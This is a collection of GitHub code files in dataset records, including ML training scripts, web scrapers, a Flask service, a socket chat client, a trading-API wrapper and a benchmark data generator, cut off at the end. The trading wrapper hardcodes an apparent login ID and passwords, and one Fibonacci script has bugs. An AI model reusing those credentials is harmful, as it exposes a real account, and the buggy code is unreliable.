\"events\").save()\n","repo_name":"kennycontreras/meetup-collector","sub_path":"event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":4365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"12800278808","text":"import keras\nimport tensorflow as tf\nimport tensorflow_addons as tfa\nimport keras_wrn\n\nimport sys\n\nfrom keras.optimizers import SGD\n\nprefix = sys.argv[1]\n\n(x_train, y_train), (x_test, y_test) = keras.datasets.cifar10.load_data()\ny_train = keras.utils.to_categorical(y_train)\ny_test = keras.utils.to_categorical(y_test)\n\nshape, classes = (32, 32, 3), 10\n\nmodel_depth = 28\nmodel_width = 2\n\nmodel = keras_wrn.build_model(shape, classes, model_depth, model_width)\n# optimizer = tfa.optimizers.SGDW(weight_decay=0.0005, momentum=0.9, learning_rate=0.1)\n# model.compile(optimizer, \"categorical_crossentropy\", [\"accuracy\"])\nopt = SGD(lr=0.1, momentum=0.9, nesterov=True)\nmodel.compile(loss='categorical_crossentropy',\n optimizer=opt,\n metrics=['accuracy'])\n\n\ndef scheduler(epoch, lr):\n if epoch in (80, 100, 120):\n lr = lr * 0.2 \n return lr\n\ndef model_save_callback(epoch, logs):\n if epoch % 50 == 0 and epoch != 0:\n model.save('model_ckpt/{}_resnet_28_2_{}'.format(prefix, epoch))\n\nsave_call = 
tf.keras.callbacks.LambdaCallback(on_epoch_end=model_save_callback)\ncallback = tf.keras.callbacks.LearningRateScheduler(scheduler)\n\nmodel.fit(x_train, y_train, batch_size=125, epochs=140, callbacks=[callback, save_call])\n\nmodel.save('models/{}_resnet_{}_{}'.format(prefix, model_depth, model_width))\n\nresults = model.evaluate(x_test, y_test)\nprint(\"test loss, test acc:\", results)\n","repo_name":"amitab/master_thesis","sub_path":"src/ensembles/rnd_init/resnet_28_2.py","file_name":"resnet_28_2.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"22366957147","text":"#!/opt/anaconda3/bin/python\n# -*- coding: UTF-8 -*-\n\nfrom cgitb import html\nfrom common import *\n\nimport traceback\nfrom urllib import request\nfrom bs4 import BeautifulSoup\nimport os\n\n\nmathjax_script = ''''''\n\n\ndef fetch_en(id):\n en_prob_addr = f'https://projecteuler.net/problem={id}'\n rsp = request.urlopen(en_prob_addr)\n assert rsp.getcode() == 200\n raw = rsp.read()\n soup = BeautifulSoup(raw, 'html.parser')\n res = soup.find(id='content')\n assert res != None\n prob_desc = res.find(class_='problem_content')\n prob_name = res.find('h2')\n html_part = f'
原始项目
' + \\\n str(prob_name) + str(prob_desc) + '
'\n return html_part\n\n\ndef fetch_cn(id):\n cn_prob_addr = f'http://pe-cn.github.io/{id}/'\n rsp = request.urlopen(cn_prob_addr)\n assert rsp.getcode() == 200\n raw = rsp.read()\n soup = BeautifulSoup(raw, 'html.parser')\n res = soup.find(class_='post-body')\n assert res != None\n title = res.find('h1')\n if title != None:\n title.extract()\n bar = res.find('hr')\n if bar != None:\n bar.extract()\n bar = res.find('hr')\n if bar != None:\n bar.extract()\n\n html_part = f'
中文翻译站
' + str(res)\n return html_part\n\n\ndef fetch_oj(id):\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36'}\n oj_prob_addr = 'https://www.hackerrank.com/contests/projecteuler/challenges/euler{:03d}/problem'.format(\n int(id))\n req = request.Request(oj_prob_addr, headers=headers)\n rsp = request.urlopen(req)\n assert rsp.getcode() == 200\n raw = rsp.read()\n soup = BeautifulSoup(raw, 'html.parser')\n res = soup.find(class_='challenge-body-html')\n assert res != None\n sub = res.find('sub')\n if sub != None:\n sub.extract()\n html_part = f'
HackerRank
' + \\\n str(res) + '
'\n return html_part\n\n\ndef main():\n id, dir = arg_id_dir()\n part_orginal = fetch_en(id)\n part_translate = fetch_cn(id)\n part_online_judge = fetch_oj(id)\n generate_html(id, dir, part_orginal, part_translate, part_online_judge)\n\n\ndef generate_html(id, dir, *args):\n parent = f'{os.path.join(dir,id)}'\n if not os.path.exists(parent):\n os.mkdir(parent)\n with open(f'{parent}/{id}.html', 'w') as f:\n f.write('''''')\n f.write('''''')\n for arg in args:\n f.write(arg)\n f.write(mathjax_script)\n f.write('''''')\n f.write('''''')\n\n\nif __name__ == '__main__':\n try:\n main()\n except KeyboardInterrupt:\n cprint('\\nStopped', red)\n except Exception as e:\n cprint('\\nError', red)\n traceback.print_exc()\n","repo_name":"zhangtianxiang/project_euler","sub_path":"fetch.py","file_name":"fetch.py","file_ext":"py","file_size_in_byte":4503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"44399364436","text":"from time import perf_counter\n\nfor i in range(36):\n\tx=0\n\tstart_time=time.perf_counter()\n\tfor j in range(10):\n\t\tx+=fib(i)\n\tduration = (time.perf_counter()-start_time)/10\n\tprint(\"{:12.10f}\".format(duration))\n\ndef fib(n):\n\thi=1\n\tlo=0\n\tfor i in n:\n\t\ttemp=hi\n\t\thi=hi+lo\n\t\tlo=temp\n\treturn lo\n\ndef rec_fib(n):\n\tif n<2:\n\t\treturn n\n\telse:\n\t\treturn rec_fib(value-1)+rec_fib(value-2)\n","repo_name":"jimmychen9120/cosc3100-algorithms-sp21","sub_path":"fibTimer_v2.py","file_name":"fibTimer_v2.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"2307089093","text":"# 2019\n# author: yuxuan\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn.ensemble import AdaBoostClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score\n\n\nclass MyAdaBoostClassifier(object):\n def __init__(self):\n self._model = None\n\n def train_model(self, x, y):\n X_train, X_test, y_train, y_test = train_test_split(x, y, train_size=0.8, random_state=42)\n clf = AdaBoostClassifier(\n DecisionTreeClassifier(random_state=42, max_depth=2),\n n_estimators=5, random_state=42, algorithm='SAMME')\n clf = clf.fit(X_train, y_train)\n predict = clf.predict(X_train)\n accuracy = accuracy_score(y_train, predict)\n print(\"Boosted DT training accuracy: \" + \"{0:.2f}\".format(accuracy))\n predict = clf.predict(X_test)\n accuracy = accuracy_score(y_test, predict)\n print(\"Boosted DT test accuracy: \" + \"{0:.2f}\".format(accuracy))\n self._model = clf\n\n def predict(self, x):\n return self._model.predict(x)\n\n\nif __name__ == '__main__':\n df = pd.read_csv('up_down.csv')\n y_col = df.columns[-1]\n y = df.pop(y_col)\n clf = MyAdaBoostClassifier()\n clf.train_model(df, y)\n","repo_name":"pyx1992/hftml","sub_path":"model/ada_boost_classifier.py","file_name":"ada_boost_classifier.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"29791674565","text":"from flask import Flask, request,jsonify\nimport requests\nimport time\n\napp = Flask(__name__)\nstart_time = None\n\n@app.route('/strategy', methods=['POST'])\ndef strategy():\n global start_time\n start_time = time.time()\n requests.get('http://10.251.64.98:4000/api/clear_logs')\n requests.post('http://10.251.64.98:4000/api/strategy', data={\"id\":\"123456\"})\n return f'Enviado 
para execução, configra o log em /stragey_log '\n\n@app.route('/strategy_log', methods=['GET'])\ndef strategy_log():\n logs = requests.get('http://10.251.64.98:4000/api/logs')\n return f'Logs: {logs.text}'\n\n\n@app.route('/strategy2', methods=['POST'])\ndef strategy2():\n global start_time\n start_time = time.time()\n response=requests.post('http://10.251.64.98:4000/api/strategy2', data={\"id\":\"123456\"})\n end_time = time.time()\n elapsed_time = end_time - start_time\n return f'Tempo de execução: {elapsed_time} seconds, {response.text}'\n\n\n@app.route('/strategy3', methods=['POST'])\ndef strategy3():\n global start_time\n start_time = time.time()\n requests.get('http://10.251.64.98:4000/api/clear_logs')\n requests.post('http://10.251.64.98:4000/api/strategy', data={\"id\":\"123456\"})\n return f'Strategy started ...'\n\n@app.route('/event', methods=['POST'])\ndef event():\n global start_time\n response=request.get_json()\n end_time = time.time()\n elapsed_time = end_time - start_time\n return f'Tempo de execução: {elapsed_time} seconds, {response}'\n\n@app.route('/health', methods=['GET'])\ndef health():\n return \"Api is working\"\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0')\n","repo_name":"andreysantos1/teste-api","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"18514390211","text":"secret_message = input()\ncount_of_groups = int(input())\na = [\"\" for i in range(count_of_groups)]\n\nfor i in range(count_of_groups):\n #print(\"group {}:\".format(i+1), end = \" \") the second way to solve\n for j in range(i, len(secret_message), count_of_groups):\n a[i] += secret_message[j]\n #print(secret_message[j], end = \" \") the second way to solve\n print(\"group {}:\".format(i+1), a[i])\n\n\n\n#decoder\nmax = 0\ndo_readable = \"\"\nfor i in range(len(a)):\n do_readable += a[i]\n if len(a[i]) > max:\n max = len(a[i])\nfor i in range(max):\n for j in range(count_of_groups):\n if i < len(a[j]):\n print(a[j][i], end = \"\")\n#done","repo_name":"AdilAlimgozha/Python-II","sub_path":"hw1/secret_word.py","file_name":"secret_word.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"15874924599","text":"from PIL import Image\nimport os.path\nimport glob\n\n\ndef convertjpg(jpgfile, outdir, width=100, height=100):\n \"\"\"\n # jpg图片更改尺寸后保存到outdir目录下\n :param jpgfile:\n :param outdir: 输出目录\n :param width:输出图片宽度\n :param height:输出图片高度\n :return:None\n \"\"\"\n img = Image.open(jpgfile)\n try:\n new_img = img.resize((width, height), Image.ANTIALIAS)\n new_img.save(os.path.join(outdir, os.path.basename(jpgfile)))\n except Exception as e:\n print(e)\n\n\nif __name__ == \"__main__\":\n path = 'E:/ProgrammeCode/IDEA/PV_Panel_Classify'\n for jpg_file in glob.glob(path+\"/0510/N/*.jpg\"):\n convertjpg(jpg_file, path+\"/0510_resize/N\")\n for jpg_file in glob.glob(path+\"/0510/P/*.jpg\"):\n convertjpg(jpg_file, path+\"/0510_resize/P\")\n","repo_name":"fenghuayangyi/PV_Panel_Classify","sub_path":"resize_photoes.py","file_name":"resize_photoes.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"94"} +{"seq_id":"30413925241","text":"import os\n#identify the directory you are working in\nmydir = \"/Users/QuinnThomas/Desktop/BIOI_Ros/\"\n#save input file to variable #rstrip 
removes the new line character from the input file\ninfile = open( mydir + \"rosalind_revc.txt\").read().rstrip()\n#create the output file\noutfile = open(mydir + 'rosOut_8.txt', 'w')\n\n#print(infile) #debug tester\n\n#create a dictionary with the DNA complements\nDNA_dict = {\n 'A' : 'T',\n 'T' : 'A',\n 'G' : 'C',\n 'C' : 'G'}\n\nrev_comp = \"\"\n\n#create a for loop that goes through to iterate through each letter of the DNA strand\nfor i in infile:\n #save the complements of this strand in reverse order to get the reverse complement\n rev_comp = DNA_dict[i] + rev_comp \n#write the reverse complement strand to the output file\noutfile.write(rev_comp)\noutfile.close()\n\n\n\n","repo_name":"qthomas612/RosalindProblems","sub_path":"BIOI_Class1/Ros8.py","file_name":"Ros8.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"13366015345","text":"import socket\nimport sys\nimport time\n\nserver = socket.socket()\nhost = input(str(\"Please enter the host name: \"))\nport = 4321\nserver.connect((host,port))\nprint(\"Connected to server\")\nprint(\"Let him send the message first please don't do anything...\")\nwhile True:\n incoming_message = server.recv(1024)\n incoming_message = incoming_message.decode()\n print(\"Server =>> \", incoming_message)\n print(\"He/She is waiting for your message...\")\n message = input(\"You =>> \")\n message = message.encode()\n server.send(message)\n print(\"Wait for his/her message...\")\n","repo_name":"Sahil-Rajwar-2004/Projects","sub_path":"Chat CLIENT.py","file_name":"Chat CLIENT.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"369944826","text":"from Components.Frame import Frame\nfrom Components.Ball import Ball\nfrom Components.Bar import Bar\nfrom Components.Bricks import Bricks\nfrom Components.Powerups import Powerups\nfrom Components.Powerup import Powerup\n\nfrom config import POWERUPS, POWERUP_PROBABILITY, SCREEN_WIDTH, SCREEN_HEIGHT\nimport random\n\nclass Game():\n def __init__(self):\n self.frame = Frame()\n self.bar = Bar()\n self.balls = [Ball(game_init=True)]\n self.bricks = Bricks()\n self.powerups = Powerups()\n self.sticky_balls = [self.balls[0]]\n\n # variables needed for external use\n self.lives = 3\n self.score = 0\n self.quit = False\n\n # YEETS everything from the screen\n def cleanup(self):\n for ball in self.balls:\n ball.draw(True)\n for brick in self.bricks.bricks:\n brick.draw(True)\n for powerup in self.powerups.powerups:\n powerup.draw(True)\n self.bar.draw(True)\n\n # checks for winning condition\n def check_win(self):\n through = False\n for ball in self.balls:\n if ball.through:\n through = True\n break\n if through:\n self.quit = not len(self.bricks.bricks)\n\n flag = True\n for brick in self.bricks.bricks:\n if brick.strength != 4:\n flag = False\n break\n \n if flag:\n self.quit = True\n\n # handles all kinds of inputs\n def handle_input(self, c):\n if not c:\n return\n c = c.lower()\n if c == 'q':\n self.quit = True\n elif c == 'a':\n self.bar.draw(True)\n if self.bar.move(True):\n for ball in self.sticky_balls:\n ball.draw(True)\n ball.move(self.bar, True)\n ball.draw()\n elif c == 'd':\n self.bar.draw(True)\n if self.bar.move(False):\n for ball in self.sticky_balls:\n ball.draw(True)\n ball.move(self.bar, False)\n ball.draw()\n elif c == 'w':\n for ball in self.sticky_balls:\n # resetting for all the balls\n 
ball.sticky = False\n if ball.saved_velocity:\n ball.velocity = ball.saved_velocity\n ball.saved_velocity = None\n self.sticky_balls = []\n elif c == 'i':\n for ball in self.balls:\n ball.velocity = (0, -1)\n elif c == 'k':\n for ball in self.balls:\n ball.velocity = (0, 1)\n elif c == 'l':\n for ball in self.balls:\n ball.velocity = (1, 0)\n elif c == 'j':\n for ball in self.balls:\n ball.velocity = (-1, 0)\n elif c == ':':\n if self.handle_cheats(input(\"Enter cheat: \")):\n print(\"WRONG = YEET\")\n exit()\n # resets the game after all balls are lost\n def reset(self):\n # reducing lives\n self.lives -= 1\n if self.lives <= 0:\n self.quit = True\n return\n # a new hope\n else:\n x1, y1 = self.bar.start\n x2, _ = self.bar.end\n self.balls.append(Ball(((x1+x2)//2, y1-2)))\n \n # yeets balls which die\n def yeet_points(self):\n newballs = []\n for ball in self.balls:\n if ball.over:\n # shows graves of the balls\n # ball.draw(True)\n del ball\n else:\n newballs.append(ball)\n self.balls = newballs\n\n new_powerups = []\n for powerup in self.powerups.powerups:\n if powerup.over:\n powerup.draw(True)\n del powerup\n else:\n new_powerups.append(powerup)\n self.powerups.powerups = new_powerups\n\n def yeet_bricks(self):\n new_bricks = []\n for brick in self.bricks.bricks:\n if brick.yeet:\n brick.draw(True)\n self.score += 5\n \n symbol = random.choice(POWERUPS)\n x1, y1 = brick.start\n x2, y2 = brick.end\n\n if random.random() < POWERUP_PROBABILITY:\n self.powerups.powerups.append(\n Powerup(\n symbol=symbol,\n position=((x1+x2)//2, y1)\n )\n )\n \n del brick\n else:\n brick.draw()\n new_bricks.append(brick)\n self.bricks.bricks = new_bricks\n\n # handles all the moving objects\n def handle_movements(self):\n # moves the balls\n for ball in self.balls:\n if not ball.saved_velocity:\n ball.draw(True)\n ball.move()\n \n # moves the powerups\n for powerup in self.powerups.powerups:\n powerup.draw(True)\n powerup.move()\n\n # returns true if nothing matches\n def handle_cheats(self, c):\n if c == 'G':\n self.bar.grow()\n elif c == 'S':\n self.bar.shrink()\n elif c == 'T':\n for ball in self.balls:\n ball.through = True\n elif c == 'F':\n for ball in self.balls:\n ball.fast()\n elif c == 'B':\n new_balls = []\n for ball in self.balls:\n xv, yv = ball.velocity\n new_balls.append(\n Ball(\n ball.position, \n velocity=(-xv, -yv)\n )\n )\n self.balls.extend(new_balls)\n elif c == 'K':\n for ball in self.balls:\n ball.sticky = True\n else:\n return True\n\n # handles all the collisions\n def handle_collisions(self):\n # ball related collisions\n for ball in self.balls:\n saved_velocity = self.bar.handle_collided(ball)\n # only saved when sticky, since otherwise its None\n if saved_velocity: \n ball.saved_velocity = saved_velocity\n # print(ball.saved_velocity)\n self.sticky_balls.append(ball)\n\n self.frame.handle_collided(ball)\n self.bricks.handle_collided(ball)\n \n # moves the powerups\n for powerup in self.powerups.powerups:\n # yeets if out of bar bound\n self.frame.handle_collided(powerup, reflect=False)\n # checks if the powerup is absorbed\n is_absorbed = self.bar.handle_collided(powerup)\n if is_absorbed:\n powerup.over = True\n self.handle_cheats(powerup.symbol)\n\n def render(self):\n # checks if the game has been won or not\n self.check_win()\n\n # yeets balls & powerups which die\n self.yeet_points()\n # yeets bricks which die\n self.yeet_bricks()\n\n # CHECKING NEW BALL/GAME OVER CONDITION\n if not len(self.balls):\n self.reset()\n \n # MOVING OBJECTS\n self.handle_movements()\n \n # 
COLLIDING THE OBJECTS\n self.handle_collisions()\n\n # DRAW THE SHAPES\n # self.frame.draw()\n self.bar.draw()\n for ball in self.balls:\n ball.draw()\n self.bricks.draw()\n self.powerups.draw()\n","repo_name":"chaudhary1337/Dx-Ball-Ripoff","sub_path":"Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":7535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"37714230287","text":"from collections import deque, defaultdict\nfrom datetime import datetime as dt\nimport functools\nimport os\nimport time\nimport signal\n\nimport pandas as pd\nimport numpy as np\n\n#import pandas as pd\nfrom PyQt5.QAxContainer import QAxWidget\nfrom PyQt5.QtCore import QEventLoop, QTimer\nfrom PyQt5.QtWidgets import QMainWindow\n\nfrom _logger import Logger\nimport errors \n\nclass SHIndi(QMainWindow):\n\n __instance = None\n \n @classmethod\n def __getInstance(cls):\n return cls.__instance\n\n @classmethod \n def instance(cls, *args, **kwargs):\n cls.__instance = cls(*args, **kwargs)\n cls.instance = cls.__getInstance\n return cls.__instance\n\n\n def __init__(self):\n super().__init__()\n\n self.IndiTR = QAxWidget(\"GIEXPERTCONTROL.GiExpertControlCtrl.1\")\n self.IndiTR.ReceiveData.connect(self.OnReceiveData)\n self.IndiTR.ReceiveSysMsg.connect(self.OnReceiveSysMsg)\n\n self.IndiReal = QAxWidget(\"GIEXPERTCONTROL.GiExpertControlCtrl.1\")\n self.IndiReal.ReceiveRTData.connect(self.OnReceiveRealData)\n\n # Loop 변수 : 비동기 방식으로 동작되는 이벤트를 동기화 \n self.logingLoop = None\n self.requestLoop = None\n self.orderLoop = None\n self.conditionLoop = None\n\n # 서버구분 \n self.serverStatus = None\n\n # 연속조회 구분 \n self.isNext = 0\n self.rqidD = {}\n\n # logging \n self.homepath = os.environ.get(\"userprofile\")\n self.logger = Logger(path=self.log_path, name=\"SH Indi\")\n\n # 메세지 처리 \n self.msg = \"\"\n\n\n ##----------------------------------------------------------------------------------------------------------------------\n ## Function method block \n ##----------------------------------------------------------------------------------------------------------------------\n\n @property\n def log_path(self):\n path = os.path.join(self.homepath, 'log')\n if not os.path.exists(path):\n os.mkdir(path)\n \n return path\n \n\n def connect(self):\n\n while True:\n blogin = self.IndiTR.StartIndi('biyawara', 'koscom@1', 'choi9880@1', 'C:\\SHINHAN-i\\Indi GX\\giexpertstarter.exe')\n \n if blogin == True :\n self.logger.info(\"정상 접속 하였습니다\") \n break\n\n \n def setQueryName(self, value):\n self.IndiTR.dynamicCall(\"SetQueryName(QString)\",value)\n \n\n # TRCODE에 맞는 값을 설정한다. 
\n def setInputValue(self, index, key, value):\n \"\"\" TR 전송에 필요한 값을 설정한다.\n\n Parameters\n ----------\n key: str\n TR에 명시된 input 이름, ex) 계좌번호, 종목코드\n value: str\n key에 해당하는 값, ex) 88231524, 005930\n \"\"\"\n \n if not isinstance(key, str):\n key = str(key)\n\n if not isinstance(value, str):\n value = str(value)\n\n self.IndiTR.dynamicCall(\"SetSingleData(int, QString)\", index, value)\n\n\n def commRqData(self, query_name, inquire):\n returnCode = self.IndiTR.dynamicCall(\"RequestData()\")\n if returnCode <= 0: # 0이외엔 실패\n self.logger.error(\n \"commRqData {} Request Failed!\".format(query_name)\n )\n raise errors.ProcessingError()\n\n self.rqidD[returnCode] = query_name\n\n # 루프 생성: eventReceiveTrData() 메서드에서 루프를 종료시킨다.\n self.logger.debug(\"{} commRqData {}\".format(dt.now(), query_name))\n self.requestLoop = QEventLoop()\n self.requestLoop.exec_()\n\n\n ##----------------------------------------------------------------------------------------------------------------------\n ## Async Event Processing block\n ##----------------------------------------------------------------------------------------------------------------------\n def OnReceiveData(self, rqid):\n \n queryname = self.rqidD[rqid]\n print(queryname)\n\n # 해외 호가의 경우 \n if queryname == \"RH\":\n data = \"TEST\" #<-- 이곳에서 데이터 파징\n elif queryname == \"FRF_MST\":\n self.TR_FRF_MST() \n data = \"TEST\" #<-- 이곳에서 데이터 파징\n\n\n setattr(self, queryname, data)\n\n # EXIT LOOP \n try:\n self.requestLoop.exit()\n except AttributeError:\n pass \n\n\n # system event로 보임 \n def OnReceiveSysMsg(self, msgID):\n print(msgID)\n\n\n # 실시간 데이터\n def OnReceiveRealData(self, realId) :\n print(realId)\n\n\n ##----------------------------------------------------------------------------------------------------------------------\n ## TR 처리 구문 \n ##---------------------------------------------------------------------------------------------------------------------- \n \n # FRF_MST // 선물 마스터 \n def TR_FRF_MST(self):\n \n nCnt = self.IndiTR.dynamicCall(\"GetMultiRowCount()\")\n\n for i in range(0, nCnt):\n code = self.IndiTR.dynamicCall(\"GetMultiData(int, int)\", i, 0)\n name = self.IndiTR.dynamicCall(\"GetMultiData(int, int)\", i, 0)\n exchange_code = self.IndiTR.dynamicCall(\"GetMultiData(int, int)\", i, 0)\n price_point = self.IndiTR.dynamicCall(\"GetMultiData(int, int)\", i, 0)\n ns = self.IndiTR.dynamicCall(\"GetMultiData(int, int)\", i, 0)\n qte_unit = self.IndiTR.dynamicCall(\"GetMultiData(int, int)\", i, 0)\n \n","repo_name":"biyawara/shinhanindi","sub_path":"SHIndi.py","file_name":"SHIndi.py","file_ext":"py","file_size_in_byte":5638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"43352298131","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Sep 30 14:17:36 2020\r\n\r\n@author: PREET MODH\r\n\"\"\"\r\n\r\n\r\ns=list(input())\r\nt=list(input())\r\ns.reverse()\r\nt.reverse()\r\nans=0\r\nif s[0]!=t[0]:\r\n ans=len(s) + len(t)\r\nelse:\r\n cnt=0\r\n for i in range(min(len(s),len(t))):\r\n if s[i]==t[i]:\r\n cnt+=1\r\n else:\r\n break\r\n ans=(len(s) - cnt) + (len(t) - cnt)\r\nprint(ans)\r\n","repo_name":"preetmodh/COMPETETIVE_CODING_QUESTIONS","sub_path":"CODEFORCES/Delete from the Left.py","file_name":"Delete from the Left.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"7688947806","text":"#!env python3\n\nimport itertools\nimport math\nimport multiprocessing\nimport 
numpy\nimport os\nimport random\nimport string\n\n\nNUM_TUPLES = 10_000_000\nSTRLEN = 10\nOUTPUT_DIR = os.path.join('benchmark', 'operators', 'data')\nNUM_DISTINCT_VALUES = NUM_TUPLES // 10\nFKEY_JOIN_SELECTIVITY = 1e-8\nN_M_JOIN_SELECTIVITY = 1e-6\n\nTYPE_TO_STR = {\n 'b': 'BOOL',\n 'i8': 'INT(1)',\n 'i16': 'INT(2)',\n 'i32': 'INT(4)',\n 'i64': 'INT(8)',\n 'f': 'FLOAT',\n 'd': 'DOUBLE',\n}\n\nSCHEMA = {\n \"Attribute_b\": [\n ( 'id', 'i32' ),\n ( 'val', 'b' ),\n ],\n\n \"Attribute_i8\": [\n ( 'id', 'i32' ),\n ( 'val', 'i8' ),\n ],\n\n \"Attribute_i16\": [\n ( 'id', 'i32' ),\n ( 'val', 'i16' ),\n ],\n\n \"Attribute_i32\": [\n ( 'id', 'i32' ),\n ( 'val', 'i32' ),\n ],\n\n \"Attribute_i64\": [\n ( 'id', 'i32' ),\n ( 'val', 'i64' ),\n ],\n\n \"Attribute_f\": [\n ( 'id', 'i32' ),\n ( 'val', 'f' ),\n ],\n\n \"Attribute_d\": [\n ( 'id', 'i32' ),\n ( 'val', 'd' ),\n ],\n\n \"Distinct_i32\": [\n ( 'id', 'i32' ),\n ( 'n1', 'i32', 1 ),\n ( 'n10', 'i32', 10 ),\n ( 'n100', 'i32', 100 ),\n ( 'n1000', 'i32', 1000 ),\n ( 'n10000', 'i32', 10000 ),\n ( 'n100000', 'i32', 100000 ),\n ],\n\n \"Relation\": [\n ( 'id', 'i32' ),\n ( 'fid', 'i32' ),\n ( 'n2m', 'i32' ),\n ],\n\n \"Attributes_multi_b\": [\n ( 'id', 'i32' ),\n ( 'a0', 'b' ),\n ( 'a1', 'b' ),\n ( 'a2', 'b' ),\n ( 'a3', 'b' ),\n ],\n\n \"Attributes_multi_i32\": [\n ( 'id', 'i32' ),\n ( 'a0', 'i32' ),\n ( 'a1', 'i32' ),\n ( 'a2', 'i32' ),\n ( 'a3', 'i32' ),\n ],\n\n \"Attributes_multi_i64\": [\n ( 'id', 'i32' ),\n ( 'a0', 'i64' ),\n ( 'a1', 'i64' ),\n ( 'a2', 'i64' ),\n ( 'a3', 'i64' ),\n ],\n\n \"Attributes_multi_f\": [\n ( 'id', 'i32' ),\n ( 'a0', 'f' ),\n ( 'a1', 'f' ),\n ( 'a2', 'f' ),\n ( 'a3', 'f' ),\n ],\n\n \"Attributes_multi_d\": [\n ( 'id', 'i32' ),\n ( 'a0', 'd' ),\n ( 'a1', 'd' ),\n ( 'a2', 'd' ),\n ( 'a3', 'd' ),\n ],\n}\n\n\n#=======================================================================================================================\n# Helper Functions\n#=======================================================================================================================\n\n# Process an `iterable` in groups of size `n`\ndef grouper(iterable, n):\n it = iter(iterable)\n while True:\n chunk_it = itertools.islice(it, n)\n try:\n first_el = next(chunk_it)\n except StopIteration:\n return\n yield itertools.chain((first_el,), chunk_it)\n\n# Generate `num` distinct integer values, drawn uniformly at random from the range [ `smallest`, `largest` ).\ndef gen_random_int_values(smallest :int, largest :int, num :int):\n assert largest - smallest >= num\n\n if largest - smallest == num:\n return list(range(smallest, largest))\n\n taken = set()\n counter = largest - num\n values = list()\n\n for i in range(0, num):\n val = random.randrange(smallest, largest - num)\n if val in taken:\n values.append(counter)\n counter += 1\n else:\n taken.add(val)\n values.append(val)\n\n assert len(values) == len(set(values))\n return values\n\n\n#=======================================================================================================================\n# Data Generation\n#=======================================================================================================================\n\ndef gen_database(name, schema, path_to_dir):\n with open(os.path.join(path_to_dir, 'schema.sql'), 'w') as sql:\n sql.write(f'''\\\nCREATE DATABASE {name};\nUSE {name};\n''')\n\n for table_name, attributes in schema.items():\n sql.write(f'''\nCREATE TABLE {table_name}\n(\n''')\n attrs = list()\n for attr in attributes:\n attrs.append(f' {attr[0]} 
{TYPE_TO_STR[attr[1]]} NOT NULL')\n sql.write(',\\n'.join(attrs))\n\n path_to_csv = os.path.join(path_to_dir, f'{table_name}.csv')\n sql.write(f'''\n);\n'''\n)\n\ndef gen_column(attr, num_tuples):\n name = attr[0]\n ty = attr[1]\n num_distinct_values = attr[2] if len(attr) >= 3 else NUM_DISTINCT_VALUES\n random.seed(hash(name))\n\n if 'fid' in name:\n num_fids_joining = min(int(FKEY_JOIN_SELECTIVITY * num_tuples * num_tuples), num_tuples)\n foreign_keys = [ random.randrange(0, num_tuples) for i in range(num_fids_joining) ]\n foreign_keys.extend([num_tuples] * (num_tuples - num_fids_joining))\n assert len(foreign_keys) == num_tuples\n random.shuffle(foreign_keys)\n print(f' + Generated column {name} of {num_tuples:,} rows with {num_fids_joining:,} foreign keys with a join partner.')\n return map(str, foreign_keys)\n elif 'id' in name:\n print(f' + Generated column {name} of {num_tuples:,} rows with keys from 0 to {num_tuples-1:,}.')\n return map(str, range(num_tuples))\n elif 'n2m' in name: # n to m join\n num_distinct_values = int(round(1 / N_M_JOIN_SELECTIVITY))\n values = gen_random_int_values(-2**31 + 1, 2**31, num_distinct_values)\n elif ty == 'b':\n values = [ 'TRUE', 'FALSE' ]\n elif ty == 'f' or ty == 'd':\n values = [ random.random() for i in range(num_distinct_values) ]\n elif ty == 'i8':\n values = gen_random_int_values( -2**7 + 1, 2**7, min( 2**8 - 1, num_distinct_values))\n elif ty == 'i16':\n values = gen_random_int_values(-2**15 + 1, 2**15, min(2**16 - 1, num_distinct_values))\n elif ty == 'i32':\n values = gen_random_int_values(-2**31 + 1, 2**31, min(2**32 - 1, num_distinct_values))\n elif ty == 'i64':\n values = gen_random_int_values(-2**63 + 1, 2**63, min(2**64 - 1, num_distinct_values))\n else:\n raise Exception('unsupported type')\n\n data = list(itertools.chain.from_iterable(itertools.repeat(values, math.ceil(num_tuples / len(values)))))[0:num_tuples]\n print(f' + Generated column {name} of {len(data):,} rows with {len(set(data)):,} distinct values.')\n random.shuffle(data)\n return map(str, data)\n\ndef gen_table(table_name, attributes, path_to_dir):\n print(f'Generating data for table {table_name}')\n with 